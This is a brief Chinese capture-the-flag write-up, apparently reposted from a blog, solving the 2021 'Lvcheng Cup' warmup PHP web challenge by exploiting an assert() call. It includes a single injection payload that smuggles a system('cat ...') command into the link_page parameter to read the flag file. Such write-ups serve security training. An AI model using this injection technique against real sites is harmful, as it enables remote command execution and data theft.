2021年“绿城杯”网络安全大赛-Web-[warmup]ezphp

2021年“绿城杯”网络安全大赛-Web-[warmup]ezphp

题目名称：[warmup]ezphp
题目内容：很简单的一道PHP
题目分值：100.0
题目难度：容易
相关附件：[warmup]ezphp的附件13.txt

解题思路：

1.F12看见提示 flag

在这里插入图片描述

2.根据报错提示，知道flag文件的位置。 ./pages/flag.php，以及调用了assert的断言函数

3.那么就可以任意命令执行了。

?link_page='.system("cat ./pages/flag.php").'

版权声明：本文为qq_43264813原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接和本声明。

原文链接：https://blog.csdn.net/qq_43264813/article/details/120557144